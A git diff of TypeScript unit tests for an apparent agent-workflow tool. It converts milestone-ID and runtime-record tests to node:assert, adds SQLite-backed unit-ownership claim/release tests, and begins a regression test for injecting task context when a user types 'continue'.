+    assert.deepStrictEqual(sorted, ['M001', 'M002-z9a8b7', 'M003-abc123'], 'sorts mixed IDs by sequence number');
 
     // All old format
     const oldOnly = ['M003', 'M001', 'M002'];
-    assertEq([...oldOnly].sort(milestoneIdSort), ['M001', 'M002', 'M003'], 'sorts old-format IDs');
+    assert.deepStrictEqual([...oldOnly].sort(milestoneIdSort), ['M001', 'M002', 'M003'], 'sorts old-format IDs');
 
     // Invalid entries sort to front (seq 0)
     const withInvalid = ['M002', 'notes', 'M001'];
-    assertEq([...withInvalid].sort(milestoneIdSort), ['notes', 'M001', 'M002'], 'invalid entries (seq 0) sort first');
+    assert.deepStrictEqual([...withInvalid].sort(milestoneIdSort), ['notes', 'M001', 'M002'], 'invalid entries (seq 0) sort first');
   }
 
   // (e) generateMilestoneSuffix
   {
     console.log('  (e) generateMilestoneSuffix');
     const suffix1 = generateMilestoneSuffix();
-    assertEq(suffix1.length, 6, 'suffix length is 6');
-    assertMatch(suffix1, /^[a-z0-9]{6}$/, 'suffix matches [a-z0-9]{6}');
+    assert.deepStrictEqual(suffix1.length, 6, 'suffix length is 6');
+    assert.match(suffix1, /^[a-z0-9]{6}$/, 'suffix matches [a-z0-9]{6}');
 
     const suffix2 = generateMilestoneSuffix();
-    assertEq(suffix2.length, 6, 'second suffix length is 6');
-    assertMatch(suffix2, /^[a-z0-9]{6}$/, 'second suffix matches [a-z0-9]{6}');
+    assert.deepStrictEqual(suffix2.length, 6, 'second suffix length is 6');
+    assert.match(suffix2, /^[a-z0-9]{6}$/, 'second suffix matches [a-z0-9]{6}');
 
     // Two calls should produce different results (36^6 = ~2.2B possibilities)
-    assertTrue(suffix1 !== suffix2, 'two calls produce different suffixes');
+    assert.ok(suffix1 !== suffix2, 'two calls produce different suffixes');
   }
 
   // (f) nextMilestoneId
   {
     console.log('  (f) nextMilestoneId');
     // uniqueEnabled=false (default) → old format
-    assertEq(nextMilestoneId([]), 'M001', 'empty + uniqueEnabled=false → M001');
-    assertEq(nextMilestoneId(['M001', 'M002']), 'M003', 'sequential + uniqueEnabled=false → M003');
-    assertEq(nextMilestoneId(['M001', 'M002'], false), 'M003', 'explicit false → M003');
+    assert.deepStrictEqual(nextMilestoneId([]), 'M001', 'empty + uniqueEnabled=false → M001');
+    assert.deepStrictEqual(nextMilestoneId(['M001', 'M002']), 'M003', 'sequential + uniqueEnabled=false → M003');
+    assert.deepStrictEqual(nextMilestoneId(['M001', 'M002'], false), 'M003', 'explicit false → M003');
 
     // uniqueEnabled=true → unique format
     const newId = nextMilestoneId([], true);
-    assertMatch(newId, MILESTONE_ID_RE, 'uniqueEnabled=true produces valid ID');
-    assertTrue(newId.startsWith('M001-'), 'uniqueEnabled=true starts with M001-');
-    assertMatch(newId, /^M001-[a-z0-9]{6}$/, 'empty + uniqueEnabled=true → M001-{rand6}');
+    assert.match(newId, MILESTONE_ID_RE, 'uniqueEnabled=true produces valid ID');
+    assert.ok(newId.startsWith('M001-'), 'uniqueEnabled=true starts with M001-');
+    assert.match(newId, /^M001-[a-z0-9]{6}$/, 'empty + uniqueEnabled=true → M001-{rand6}');
 
     // Mixed array with uniqueEnabled=true
     const mixedIds = ['M001', 'M003-abc123', 'M002'];
     const nextNew = nextMilestoneId(mixedIds, true);
-    assertMatch(nextNew, MILESTONE_ID_RE, 'mixed array + uniqueEnabled=true → valid ID');
-    assertMatch(nextNew, /^M004-[a-z0-9]{6}$/, 'mixed array max=3 → M004-{rand6}');
+    assert.match(nextNew, MILESTONE_ID_RE, 'mixed array + uniqueEnabled=true → valid ID');
+    assert.match(nextNew, /^M004-[a-z0-9]{6}$/, 'mixed array max=3 → M004-{rand6}');
 
     // Mixed array with uniqueEnabled=false
-    assertEq(nextMilestoneId(mixedIds, false), 'M004', 'mixed array + uniqueEnabled=false → M004');
+    assert.deepStrictEqual(nextMilestoneId(mixedIds, false), 'M004', 'mixed array + uniqueEnabled=false → M004');
 
     // Correct sequential number from mixed arrays
     const mixedIds2 = ['M005-xyz999', 'M002'];
-    assertEq(nextMilestoneId(mixedIds2, false), 'M006', 'mixed max=5 → M006');
+    assert.deepStrictEqual(nextMilestoneId(mixedIds2, false), 'M006', 'mixed max=5 → M006');
     const nextNew2 = nextMilestoneId(mixedIds2, true);
-    assertMatch(nextNew2, /^M006-[a-z0-9]{6}$/, 'mixed max=5 + unique → M006-{rand6}');
+    assert.match(nextNew2, /^M006-[a-z0-9]{6}$/, 'mixed max=5 + unique → M006-{rand6}');
   }
 
   // (g) maxMilestoneNum
   {
     console.log('  (g) maxMilestoneNum');
     // Empty
-    assertEq(maxMilestoneNum([]), 0, 'empty → 0');
+    assert.deepStrictEqual(maxMilestoneNum([]), 0, 'empty → 0');
 
     // Old format only
-    assertEq(maxMilestoneNum(['M001', 'M002', 'M003']), 3, 'old format only → 3');
+    assert.deepStrictEqual(maxMilestoneNum(['M001', 'M002', 'M003']), 3, 'old format only → 3');
 
     // Unique format only — must not return NaN
-    assertEq(maxMilestoneNum(['M001-abc123', 'M002-def456']), 2, 'unique format only → 2');
-    assertTrue(!Number.isNaN(maxMilestoneNum(['M001-abc123'])), 'unique format does not return NaN');
+    assert.deepStrictEqual(maxMilestoneNum(['M001-abc123', 'M002-def456']), 2, 'unique format only → 2');
+    assert.ok(!Number.isNaN(maxMilestoneNum(['M001-abc123'])), 'unique format does not return NaN');
 
     // Mixed formats
-    assertEq(maxMilestoneNum(['M001', 'M003-abc123', 'M002']), 3, 'mixed → 3');
+    assert.deepStrictEqual(maxMilestoneNum(['M001', 'M003-abc123', 'M002']), 3, 'mixed → 3');
 
     // Non-matching entries ignored
-    assertEq(maxMilestoneNum(['M001', 'notes', '.DS_Store', 'M003']), 3, 'non-matching ignored → 3');
-    assertEq(maxMilestoneNum(['notes', '.DS_Store']), 0, 'all non-matching → 0');
+    assert.deepStrictEqual(maxMilestoneNum(['M001', 'notes', '.DS_Store', 'M003']), 3, 'non-matching ignored → 3');
+    assert.deepStrictEqual(maxMilestoneNum(['notes', '.DS_Store']), 0, 'all non-matching → 0');
   }
 
   // (h) Preferences round-trip via renderPreferencesForSystemPrompt
@@ -179,41 +179,25 @@ async function main(): Promise<void> {
     // validate { unique_milestone_ids: true } → field preserved (no validation error)
     const prefsTrue: GSDPreferences = { unique_milestone_ids: true };
     const renderedTrue = renderPreferencesForSystemPrompt(prefsTrue);
-    assertTrue(!renderedTrue.includes('some preference values were ignored'), 'unique_milestone_ids: true validates without error');
+    assert.ok(!renderedTrue.includes('some preference values were ignored'), 'unique_milestone_ids: true validates without error');
 
     // validate { unique_milestone_ids: undefined } → field absent (no error)
     const prefsUndefined: GSDPreferences = {};
     const renderedUndefined = renderPreferencesForSystemPrompt(prefsUndefined);
-    assertTrue(!renderedUndefined.includes('some preference values were ignored'), 'undefined unique_milestone_ids validates without error');
+    assert.ok(!renderedUndefined.includes('some preference values were ignored'), 'undefined unique_milestone_ids validates without error');
 
     // validate { unique_milestone_ids: false } → also valid
     const prefsFalse: GSDPreferences = { unique_milestone_ids: false };
     const renderedFalse = renderPreferencesForSystemPrompt(prefsFalse);
-    assertTrue(!renderedFalse.includes('some preference values were ignored'), 'unique_milestone_ids: false validates without error');
+    assert.ok(!renderedFalse.includes('some preference values were ignored'), 'unique_milestone_ids: false validates without error');
 
     // validate coercion: truthy non-boolean → coerced to boolean (no crash)
     const prefsCoerced: GSDPreferences = { unique_milestone_ids: 1 as unknown as boolean };
     const renderedCoerced = renderPreferencesForSystemPrompt(prefsCoerced);
-    assertTrue(!renderedCoerced.includes('some preference values were ignored'), 'truthy non-boolean coerces without validation error');
+    assert.ok(!renderedCoerced.includes('some preference values were ignored'), 'truthy non-boolean coerces without validation error');
 
     // GSDPreferences interface accepts the field (compile-time check — if this compiles, it works)
     const prefs: GSDPreferences = { unique_milestone_ids: true, version: 1 };
-    assertTrue(prefs.unique_milestone_ids === true, 'GSDPreferences interface accepts unique_milestone_ids');
+    assert.ok(prefs.unique_milestone_ids === true, 'GSDPreferences interface accepts unique_milestone_ids');
   }
-
-  report();
-}
-
-// When run via vitest, wrap in test(); when run via tsx, call directly.
-const isVitest = typeof globalThis !== 'undefined' && (globalThis as any).__vitest_worker__?.config?.defines != null && 'vitest' in (globalThis as any).__vitest_worker__.config.defines || process.env.VITEST;
-if (isVitest) {
-  const { test } = await import('node:test');
-  test('unique-milestone-ids: all ID primitives handle both formats', async () => {
-    await main();
-  });
-} else {
-  main().catch((error) => {
-    console.error(error);
-    process.exit(1);
-  });
-}
+});
diff --git a/src/resources/extensions/gsd/tests/unit-ownership.test.ts b/src/resources/extensions/gsd/tests/unit-ownership.test.ts
new file mode 100644
index 000000000..39ea6202f
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/unit-ownership.test.ts
@@ -0,0 +1,258 @@
+// GSD — unit-ownership tests
+// Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+
+import test from 'node:test';
+import assert from 'node:assert/strict';
+import { mkdtempSync, rmSync } from 'node:fs';
+import { join } from 'node:path';
+import { tmpdir } from 'node:os';
+
+import {
+  claimUnit,
+  releaseUnit,
+  getOwner,
+  checkOwnership,
+  taskUnitKey,
+  sliceUnitKey,
+  initOwnershipTable,
+  closeOwnershipDb,
+} from '../unit-ownership.ts';
+
+function makeTmpBase(): string {
+  return mkdtempSync(join(tmpdir(), 'gsd-ownership-'));
+}
+
+function cleanup(base: string): void {
+  try { rmSync(base, { recursive: true, force: true }); } catch { /* noop */ }
+}
+
+// ─── Key builders ────────────────────────────────────────────────────────
+
+test('taskUnitKey: builds correct key', () => {
+  assert.equal(taskUnitKey('M001', 'S01', 'T01'), 'M001/S01/T01');
+});
+
+test('sliceUnitKey: builds correct key', () => {
+  assert.equal(sliceUnitKey('M001', 'S01'), 'M001/S01');
+});
+
+// ─── Claim / get / release (SQLite-backed) ──────────────────────────────
+
+test('claimUnit: creates DB and records agent', () => {
+  const base = makeTmpBase();
+  try {
+    initOwnershipTable(base);
+    const claimed = claimUnit(base, 'M001/S01/T01', 'executor-01');
+
+    assert.equal(claimed, true, 'first claim should succeed');
+    assert.equal(getOwner(base, 'M001/S01/T01'), 'executor-01');
+  } finally {
+    closeOwnershipDb(base);
+    cleanup(base);
+  }
+});
+
+test('claimUnit: rejects second claim on same unit (first-writer-wins)', () => {
+  const base = makeTmpBase();
+  try {
+    initOwnershipTable(base);
+    const first = claimUnit(base, 'M001/S01/T01', 'executor-01');
+    const second = claimUnit(base, 'M001/S01/T01', 'executor-02');
+
+    assert.equal(first, true, 'first claim should succeed');
+    assert.equal(second, false, 'second claim should fail (first-writer-wins)');
+    assert.equal(getOwner(base, 'M001/S01/T01'), 'executor-01',
+      'original owner must be preserved');
+  } finally {
+    closeOwnershipDb(base);
+    cleanup(base);
+  }
+});
+
+test('claimUnit: same agent re-claiming same unit succeeds', () => {
+  const base = makeTmpBase();
+  try {
+    initOwnershipTable(base);
+    const first = claimUnit(base, 'M001/S01/T01', 'agent-a');
+    const second = claimUnit(base, 'M001/S01/T01', 'agent-a');
+
+    assert.equal(first, true);
+    assert.equal(second, true, 're-claim by same agent should succeed');
+    assert.equal(getOwner(base, 'M001/S01/T01'), 'agent-a');
+  } finally {
+    closeOwnershipDb(base);
+    cleanup(base);
+  }
+});
+
+test('claimUnit: multiple units can be claimed independently', () => {
+  const base = makeTmpBase();
+  try {
+    initOwnershipTable(base);
+    claimUnit(base, 'M001/S01/T01', 'agent-a');
+    claimUnit(base, 'M001/S01/T02', 'agent-b');
+
+    assert.equal(getOwner(base, 'M001/S01/T01'), 'agent-a');
+    assert.equal(getOwner(base, 'M001/S01/T02'), 'agent-b');
+  } finally {
+    closeOwnershipDb(base);
+    cleanup(base);
+  }
+});
+
+test('getOwner: returns null when no DB initialized', () => {
+  const base = makeTmpBase();
+  try {
+    initOwnershipTable(base);
+    assert.equal(getOwner(base, 'M001/S01/T01'), null);
+  } finally {
+    closeOwnershipDb(base);
+    cleanup(base);
+  }
+});
+
+test('getOwner: returns null for unclaimed unit', () => {
+  const base = makeTmpBase();
+  try {
+    initOwnershipTable(base);
+    claimUnit(base, 'M001/S01/T01', 'agent-a');
+    assert.equal(getOwner(base, 'M001/S01/T99'), null);
+  } finally {
+    closeOwnershipDb(base);
+    cleanup(base);
+  }
+});
+
+test('releaseUnit: removes claim', () => {
+  const base = makeTmpBase();
+  try {
+    initOwnershipTable(base);
+    claimUnit(base, 'M001/S01/T01', 'agent-a');
+    releaseUnit(base, 'M001/S01/T01');
+
+    assert.equal(getOwner(base, 'M001/S01/T01'), null);
+  } finally {
+    closeOwnershipDb(base);
+    cleanup(base);
+  }
+});
+
+test('releaseUnit: no-op for non-existent claim', () => {
+  const base = makeTmpBase();
+  try {
+    initOwnershipTable(base);
+    // Should not throw
+    releaseUnit(base, 'M001/S01/T01');
+  } finally {
+    closeOwnershipDb(base);
+    cleanup(base);
+  }
+});
+
+test('releaseUnit: allows reclaim after release', () => {
+  const base = makeTmpBase();
+  try {
+    initOwnershipTable(base);
+    claimUnit(base, 'M001/S01/T01', 'agent-a');
+    releaseUnit(base, 'M001/S01/T01');
+
+    const reclaimed = claimUnit(base, 'M001/S01/T01', 'agent-b');
+    assert.equal(reclaimed, true, 'reclaim after release should succeed');
+    assert.equal(getOwner(base, 'M001/S01/T01'), 'agent-b');
+  } finally {
+    closeOwnershipDb(base);
+    cleanup(base);
+  }
+});
+
+// ─── checkOwnership ──────────────────────────────────────────────────────
+
+test('checkOwnership: returns null when no actorName provided (opt-in)', () => {
+  const base = makeTmpBase();
+  try {
+    initOwnershipTable(base);
+    claimUnit(base, 'M001/S01/T01', 'agent-a');
+
+    // No actorName → ownership not enforced
+    assert.equal(checkOwnership(base, 'M001/S01/T01', undefined), null);
+  } finally {
+    closeOwnershipDb(base);
+    cleanup(base);
+  }
+});
+
+test('checkOwnership: returns null when unit is unclaimed', () => {
+  const base = makeTmpBase();
+  try {
+    initOwnershipTable(base);
+    claimUnit(base, 'M001/S01/T01', 'agent-a');
+
+    // Different unit, unclaimed
+    assert.equal(checkOwnership(base, 'M001/S01/T99', 'agent-b'), null);
+  } finally {
+    closeOwnershipDb(base);
+    cleanup(base);
+  }
+});
+
+test('checkOwnership: returns null when actor matches owner', () => {
+  const base = makeTmpBase();
+  try {
+    initOwnershipTable(base);
+    claimUnit(base, 'M001/S01/T01', 'agent-a');
+
+    assert.equal(checkOwnership(base, 'M001/S01/T01', 'agent-a'), null);
+  } finally {
+    closeOwnershipDb(base);
+    cleanup(base);
+  }
+});
+
+test('checkOwnership: returns error string when actor does not match owner', () => {
+  const base = makeTmpBase();
+  try {
+    initOwnershipTable(base);
+    claimUnit(base, 'M001/S01/T01', 'agent-a');
+
+    const err = checkOwnership(base, 'M001/S01/T01', 'agent-b');
+    assert.ok(err !== null, 'should return error');
+    assert.match(err!, /owned by agent-a/);
+    assert.match(err!, /not agent-b/);
+  } finally {
+    closeOwnershipDb(base);
+    cleanup(base);
+  }
+});
+
+// ─── Race condition: first-writer-wins atomicity ─────────────────────────
+
+test('claimUnit: concurrent claims — only first writer wins (no lost update)', () => {
+  const base = makeTmpBase();
+  try {
+    initOwnershipTable(base);
+
+    // Simulate the race described in #2728:
+    // Two agents both try to claim the same unit.
+    // With SQLite INSERT OR IGNORE, only the first succeeds.
+    const results: boolean[] = [];
+    const agents = ['agent-alpha', 'agent-beta', 'agent-gamma'];
+    for (const agent of agents) {
+      results.push(claimUnit(base, 'M001/S01/T01', agent));
+    }
+
+    // Exactly one agent should have won
+    const wins = results.filter(r => r === true);
+    assert.equal(wins.length, 1, 'exactly one agent should win the claim');
+
+    // The winner is the first agent (deterministic in single-threaded)
+    assert.equal(results[0], true);
+    assert.equal(results[1], false);
+    assert.equal(results[2], false);
+
+    // The owner must be the first agent
+    assert.equal(getOwner(base, 'M001/S01/T01'), 'agent-alpha');
+  } finally {
+    closeOwnershipDb(base);
+    cleanup(base);
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/unit-runtime.test.ts b/src/resources/extensions/gsd/tests/unit-runtime.test.ts
index 69e21d131..6f892d5b5 100644
--- a/src/resources/extensions/gsd/tests/unit-runtime.test.ts
+++ b/src/resources/extensions/gsd/tests/unit-runtime.test.ts
@@ -9,9 +9,9 @@ import {
   writeUnitRuntimeRecord,
 } from "../unit-runtime.ts";
 import { clearPathCache } from '../paths.ts';
-import { createTestContext } from './test-helpers.ts';
+import { test } from 'node:test';
+import assert from 'node:assert/strict';
 
-const { assertEq, assertTrue, report } = createTestContext();
 const base = mkdtempSync(join(tmpdir(), "gsd-unit-runtime-test-"));
 const tasksDir = join(base, ".gsd", "milestones", "M100", "slices", "S02", "tasks");
 mkdirSync(tasksDir, { recursive: true });
@@ -25,22 +25,22 @@ writeFileSync(
 console.log("\n=== runtime record write/read/update ===");
 {
   const first = writeUnitRuntimeRecord(base, "execute-task", "M100/S02/T09", 1000, { phase: "dispatched" });
-  assertEq(first.phase, "dispatched", "initial phase");
+  assert.deepStrictEqual(first.phase, "dispatched", "initial phase");
   const second = writeUnitRuntimeRecord(base, "execute-task", "M100/S02/T09", 1000, { phase: "wrapup-warning-sent", wrapupWarningSent: true });
-  assertEq(second.wrapupWarningSent, true, "warning persisted");
+  assert.deepStrictEqual(second.wrapupWarningSent, true, "warning persisted");
   const loaded = readUnitRuntimeRecord(base, "execute-task", "M100/S02/T09");
-  assertTrue(loaded !== null, "record readable");
-  assertEq(loaded!.phase, "wrapup-warning-sent", "updated phase readable");
+  assert.ok(loaded !== null, "record readable");
+  assert.deepStrictEqual(loaded!.phase, "wrapup-warning-sent", "updated phase readable");
 }
 
 console.log("\n=== execute-task durability inspection ===");
 {
   let status = await inspectExecuteTaskDurability(base, "M100/S02/T09");
-  assertTrue(status !== null, "status exists");
-  assertEq(status!.summaryExists, false, "summary initially missing");
-  assertEq(status!.taskChecked, false, "task initially unchecked");
-  assertEq(status!.nextActionAdvanced, false, "next action initially stale");
-  assertTrue(/summary missing/i.test(formatExecuteTaskRecoveryStatus(status!)), "diagnostic mentions summary");
+  assert.ok(status !== null, "status exists");
+  assert.deepStrictEqual(status!.summaryExists, false, "summary initially missing");
+  assert.deepStrictEqual(status!.taskChecked, false, "task initially unchecked");
+  assert.deepStrictEqual(status!.nextActionAdvanced, false, "next action initially stale");
+  assert.ok(/summary missing/i.test(formatExecuteTaskRecoveryStatus(status!)), "diagnostic mentions summary");
 
   writeFileSync(join(tasksDir, "T09-SUMMARY.md"), "# done\n", "utf-8");
   writeFileSync(
@@ -52,17 +52,17 @@ console.log("\n=== execute-task durability inspection ===");
   clearPathCache();
 
   status = await inspectExecuteTaskDurability(base, "M100/S02/T09");
-  assertEq(status!.summaryExists, true, "summary found after write");
-  assertEq(status!.taskChecked, true, "task checked after update");
-  assertEq(status!.nextActionAdvanced, true, "next action advanced after update");
-  assertEq(formatExecuteTaskRecoveryStatus(status!), "all durable task artifacts present", "clean diagnostic when complete");
+  assert.deepStrictEqual(status!.summaryExists, true, "summary found after write");
+  assert.deepStrictEqual(status!.taskChecked, true, "task checked after update");
+  assert.deepStrictEqual(status!.nextActionAdvanced, true, "next action advanced after update");
+  assert.deepStrictEqual(formatExecuteTaskRecoveryStatus(status!), "all durable task artifacts present", "clean diagnostic when complete");
 }
 
 console.log("\n=== runtime record cleanup ===");
 {
   clearUnitRuntimeRecord(base, "execute-task", "M100/S02/T09");
   const loaded = readUnitRuntimeRecord(base, "execute-task", "M100/S02/T09");
-  assertEq(loaded, null, "record removed");
+  assert.deepStrictEqual(loaded, null, "record removed");
 }
 
 console.log("\n=== hook unit type sanitization (slash in unitType) ===");
@@ -70,23 +70,23 @@ console.log("\n=== hook unit type sanitization (slash in unitType) ===");
   // Hook units have unitType like "hook/code-review" with a slash
   // This should NOT create a subdirectory - the slash must be sanitized
   const hookRecord = writeUnitRuntimeRecord(base, "hook/code-review", "M100/S02/T10", 2000, { phase: "dispatched" });
-  assertEq(hookRecord.unitType, "hook/code-review", "unitType preserved in record");
-  assertEq(hookRecord.unitId, "M100/S02/T10", "unitId preserved in record");
+  assert.deepStrictEqual(hookRecord.unitType, "hook/code-review", "unitType preserved in record");
+  assert.deepStrictEqual(hookRecord.unitId, "M100/S02/T10", "unitId preserved in record");
   
   const loaded = readUnitRuntimeRecord(base, "hook/code-review", "M100/S02/T10");
-  assertTrue(loaded !== null, "hook record readable");
-  assertEq(loaded!.phase, "dispatched", "hook phase correct");
+  assert.ok(loaded !== null, "hook record readable");
+  assert.deepStrictEqual(loaded!.phase, "dispatched", "hook phase correct");
   
   // Verify the file is in the units dir, not in a subdirectory
   const unitsDir = join(base, ".gsd", "runtime", "units");
   const files = readdirSync(unitsDir);
   const hookFile = files.find((f: string) => f.includes("hook-code-review"));
-  assertTrue(hookFile !== undefined, "hook file exists with sanitized name");
-  assertTrue(!files.some((f: string) => f === "hook"), "no 'hook' subdirectory created");
+  assert.ok(hookFile !== undefined, "hook file exists with sanitized name");
+  assert.ok(!files.some((f: string) => f === "hook"), "no 'hook' subdirectory created");
   
   clearUnitRuntimeRecord(base, "hook/code-review", "M100/S02/T10");
   const cleared = readUnitRuntimeRecord(base, "hook/code-review", "M100/S02/T10");
-  assertEq(cleared, null, "hook record removed");
+  assert.deepStrictEqual(cleared, null, "hook record removed");
 }
 
 // ─── Must-have durability integration tests ───────────────────────────────
@@ -121,13 +121,13 @@ console.log("\n=== must-haves: all mentioned in summary ===");
   writeFileSync(join(mhBase, ".gsd", "STATE.md"), "## Next Action\nExecute T02 for S01: next thing\n", "utf-8");
 
   const status = await inspectExecuteTaskDurability(mhBase, "M200/S01/T01");
-  assertTrue(status !== null, "mh-all: status exists");
-  assertEq(status!.mustHaveCount, 3, "mh-all: mustHaveCount is 3");
-  assertEq(status!.mustHavesMentionedInSummary, 3, "mh-all: all 3 must-haves mentioned");
-  assertEq(status!.summaryExists, true, "mh-all: summary exists");
-  assertEq(status!.taskChecked, true, "mh-all: task checked");
+  assert.ok(status !== null, "mh-all: status exists");
+  assert.deepStrictEqual(status!.mustHaveCount, 3, "mh-all: mustHaveCount is 3");
+  assert.deepStrictEqual(status!.mustHavesMentionedInSummary, 3, "mh-all: all 3 must-haves mentioned");
+  assert.deepStrictEqual(status!.summaryExists, true, "mh-all: summary exists");
+  assert.deepStrictEqual(status!.taskChecked, true, "mh-all: task checked");
   const diag = formatExecuteTaskRecoveryStatus(status!);
-  assertEq(diag, "all durable task artifacts present", "mh-all: diagnostic is clean when all must-haves met");
+  assert.deepStrictEqual(diag, "all durable task artifacts present", "mh-all: diagnostic is clean when all must-haves met");
 }
 
 console.log("\n=== must-haves: partially mentioned in summary ===");
@@ -156,12 +156,12 @@ console.log("\n=== must-haves: partially mentioned in summary ===");
 
   clearPathCache();
   const status = await inspectExecuteTaskDurability(mhBase, "M200/S02/T01");
-  assertTrue(status !== null, "mh-partial: status exists");
-  assertEq(status!.mustHaveCount, 3, "mh-partial: mustHaveCount is 3");
-  assertEq(status!.mustHavesMentionedInSummary, 1, "mh-partial: only 1 must-have mentioned");
+  assert.ok(status !== null, "mh-partial: status exists");
+  assert.deepStrictEqual(status!.mustHaveCount, 3, "mh-partial: mustHaveCount is 3");
+  assert.deepStrictEqual(status!.mustHavesMentionedInSummary, 1, "mh-partial: only 1 must-have mentioned");
   const diag = formatExecuteTaskRecoveryStatus(status!);
-  assertTrue(diag.includes("must-have gap"), "mh-partial: diagnostic includes 'must-have gap'");
-  assertTrue(diag.includes("1 of 3"), "mh-partial: diagnostic includes '1 of 3'");
+  assert.ok(diag.includes("must-have gap"), "mh-partial: diagnostic includes 'must-have gap'");
+  assert.ok(diag.includes("1 of 3"), "mh-partial: diagnostic includes '1 of 3'");
 }
 
 console.log("\n=== must-haves: no task plan file ===");
@@ -184,9 +184,9 @@ console.log("\n=== must-haves: no task plan file ===");
 
   clearPathCache();
   const status = await inspectExecuteTaskDurability(mhBase, "M200/S03/T01");
-  assertTrue(status !== null, "mh-noplan: status exists");
-  assertEq(status!.mustHaveCount, 0, "mh-noplan: mustHaveCount is 0 when no task plan");
-  assertEq(status!.mustHavesMentionedInSummary, 0, "mh-noplan: mustHavesMentionedInSummary is 0");
+  assert.ok(status !== null, "mh-noplan: status exists");
+  assert.deepStrictEqual(status!.mustHaveCount, 0, "mh-noplan: mustHaveCount is 0 when no task plan");
+  assert.deepStrictEqual(status!.mustHavesMentionedInSummary, 0, "mh-noplan: mustHavesMentionedInSummary is 0");
 }
 
 console.log("\n=== must-haves: present but no summary file ===");
@@ -209,10 +209,10 @@ console.log("\n=== must-haves: present but no summary file ===");
 
   clearPathCache();
   const status = await inspectExecuteTaskDurability(mhBase, "M200/S04/T01");
-  assertTrue(status !== null, "mh-nosummary: status exists");
-  assertEq(status!.mustHaveCount, 2, "mh-nosummary: mustHaveCount is 2");
-  assertEq(status!.mustHavesMentionedInSummary, 0, "mh-nosummary: mustHavesMentionedInSummary is 0 with no summary");
-  assertEq(status!.summaryExists, false, "mh-nosummary: summary doesn't exist");
+  assert.ok(status !== null, "mh-nosummary: status exists");
+  assert.deepStrictEqual(status!.mustHaveCount, 2, "mh-nosummary: mustHaveCount is 2");
+  assert.deepStrictEqual(status!.mustHavesMentionedInSummary, 0, "mh-nosummary: mustHavesMentionedInSummary is 0 with no summary");
+  assert.deepStrictEqual(status!.summaryExists, false, "mh-nosummary: summary doesn't exist");
 }
 
 console.log("\n=== must-haves: substring matching (no backtick tokens) ===");
@@ -241,18 +241,17 @@ console.log("\n=== must-haves: substring matching (no backtick tokens) ===");
 
   clearPathCache();
   const status = await inspectExecuteTaskDurability(mhBase, "M200/S05/T01");
-  assertTrue(status !== null, "mh-substr: status exists");
-  assertEq(status!.mustHaveCount, 3, "mh-substr: mustHaveCount is 3");
+  assert.ok(status !== null, "mh-substr: status exists");
+  assert.deepStrictEqual(status!.mustHaveCount, 3, "mh-substr: mustHaveCount is 3");
   // "heuristic" appears in summary for item 1, "diagnostic" for item 2, 
   // "assertions" appears in summary? No — let's check
   // Item 3: "All assertions pass" — words: "assertions", "pass" (<4 chars excluded)
   // summary doesn't contain "assertions" → not matched
-  assertEq(status!.mustHavesMentionedInSummary, 2, "mh-substr: 2 of 3 matched via substring");
+  assert.deepStrictEqual(status!.mustHavesMentionedInSummary, 2, "mh-substr: 2 of 3 matched via substring");
   const diag = formatExecuteTaskRecoveryStatus(status!);
-  assertTrue(diag.includes("must-have gap"), "mh-substr: diagnostic includes gap info");
-  assertTrue(diag.includes("2 of 3"), "mh-substr: diagnostic includes '2 of 3'");
+  assert.ok(diag.includes("must-have gap"), "mh-substr: diagnostic includes gap info");
+  assert.ok(diag.includes("2 of 3"), "mh-substr: diagnostic includes '2 of 3'");
 }
 
 rmSync(mhBase, { recursive: true, force: true });
 rmSync(base, { recursive: true, force: true });
-report();
diff --git a/src/resources/extensions/gsd/tests/unstructured-continue-context-injection.test.ts b/src/resources/extensions/gsd/tests/unstructured-continue-context-injection.test.ts
new file mode 100644
index 000000000..c784bc421
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/unstructured-continue-context-injection.test.ts
@@ -0,0 +1,163 @@
+// GSD-2 — Regression test for #3615: unstructured "continue" must inject task context
+// Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+
+/**
+ * Bug #3615: When a user types "continue" (or any bare text) to resume
+ * an in-progress session, buildGuidedExecuteContextInjection() only
+ * matched two hardcoded regex patterns (auto-dispatch and guided-resume).
+ * The function returned null for any other input, so no task context was
+ * injected — causing the agent to rebuild everything from scratch and
+ * burn ~86k tokens.
+ *
+ * This test verifies:
+ *   1. Structural: the fallback exists with phase + intent guards
+ *   2. Behavioral: RESUME_INTENT_PATTERNS matches expected prompts and
+ *      rejects non-resume prompts (control, help, diagnostic, etc.)
+ */
+
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const systemContextSource = readFileSync(
+  join(__dirname, "..", "bootstrap", "system-context.ts"),
+  "utf-8",
+);
+
+// ── Structural tests ────────────────────────────────────────────────
+
+describe("#3615 — structural: fallback exists with correct guards", () => {
+  const fnStart = systemContextSource.indexOf("async function buildGuidedExecuteContextInjection(");
+  assert.ok(fnStart >= 0, "should find buildGuidedExecuteContextInjection");
+  const fnEnd = systemContextSource.indexOf("\nasync function ", fnStart + 1);
+  const fnBody = fnEnd >= 0
+    ? systemContextSource.slice(fnStart, fnEnd)
+    : systemContextSource.slice(fnStart);
+
+  test("has a deriveState fallback after the two regex branches", () => {
+    const deriveStateCalls = fnBody.match(/deriveState\(basePath\)/g);
+    assert.ok(
+      deriveStateCalls && deriveStateCalls.length >= 2,
+      `expected >=2 deriveState(basePath) calls, got ${deriveStateCalls?.length ?? 0}`,
+    );
+  });
+
+  test("fallback is phase-gated to executing only", () => {
+    const afterFallback = fnBody.indexOf("// Fallback:");
+    assert.ok(afterFallback >= 0, "should have a fallback comment");
+    const fallbackSection = fnBody.slice(afterFallback);
+    assert.ok(
+      fallbackSection.includes('state.phase === "executing"'),
+      'fallback must be gated on state.phase === "executing"',
+    );
+  });
+
+  test("fallback is intent-gated via RESUME_INTENT_PATTERNS", () => {
+    const afterFallback = fnBody.indexOf("// Fallback:");
+    const fallbackSection = fnBody.slice(afterFallback);
+    assert.ok(
+      fallbackSection.includes("RESUME_INTENT_PATTERNS"),
+      "fallback must check RESUME_INTENT_PATTERNS before deriveState",
+    );
+  });
+
+  test("fallback calls buildTaskExecutionContextInjection with derived state", () => {
+    const afterFallback = fnBody.indexOf("// Fallback:");
+    const fallbackSection = fnBody.slice(afterFallback);
